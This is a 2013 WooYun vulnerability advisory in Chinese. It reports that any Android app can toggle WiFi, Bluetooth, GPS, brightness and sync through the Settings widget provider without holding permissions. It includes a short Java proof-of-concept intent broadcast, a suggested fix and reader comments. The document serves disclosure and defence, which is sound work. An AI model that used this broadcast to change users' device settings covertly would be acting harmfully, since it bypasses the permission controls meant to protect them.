无须权限随意开启和关闭手机wifi功能

漏洞概要

缺陷编号:WooYun-2013-019579

漏洞标题:无须权限随意开启和关闭手机wifi功能

相关厂商:Android平台

漏洞作者:SeaRobber

提交时间:2013-03-05 22:18

公开时间:2013-03-05 22:18

漏洞类型:非授权访问

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

Tags标签:

漏洞详情

披露状态:

2013-03-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Settings应用含有com.android.settings.widget.SettingsAppWidgetProvider,其伴随有onReceive方法来实现相关功能的开启和关闭;然而问题是,任何应用都可以直接发送带有此方法的intent从而启动/关闭相应功能。

详细说明:

此漏洞已经在http://**.**.**.**上举报:http://**.**.**.**/p/android/issues/detail?id=14602&q=exploit&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars不知此漏洞网站上有无,仅为得号!!!

漏洞证明:

发送下面的intent信息可以让应用触发WiFi, Bluetooth, and location provider states ,且不需要相关申请权限(CHANGE_WIFI_STATE, BLUETOOTH_ADMIN, and ACCESS_FINE_LOCATION, respectively):Intent intent = new Intent("test");intent.setClassName("com.android.settings","com.android.settings.widget.SettingsAppWidgetProvider");intent.addCategory(Intent.CATEGORY_ALTERNATIVE);intent.setData(Uri.fromParts("0", "0", "0")); // 0 is for WiFisendBroadcast(intent);Change 0 to 3 for GPS and 4 for Bluetooth. You can also toggle Brightness and Sync settings with 1 and 2, respectively.

修复方案:

对此com.android.settings.widget.SettingsAppWidgetProvider组件添加权限

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)

评价

  1. 2010-01-01 00:00 safe121 白帽子 | Rank:96 漏洞数:11)

    佩服LZ

  2. 2010-01-01 00:00 piaoye 白帽子 | Rank:284 漏洞数:43)

    有些应用还能打开gps

  3. 2010-01-01 00:00 苏南同学 白帽子 | Rank:41 漏洞数:5)

    居然不需要权限...

  4. 2010-01-01 00:00 学习乌云 白帽子 | Rank:91 漏洞数:10)

    @xsser 这种(1) 别人发现的漏洞(2)已经patched的漏洞 都能拿rank的话,我可以转发一批到乌云上啊。。。但是这样貌似是不尊重原始漏洞发现者,和已经修复这个漏洞的厂商了。。。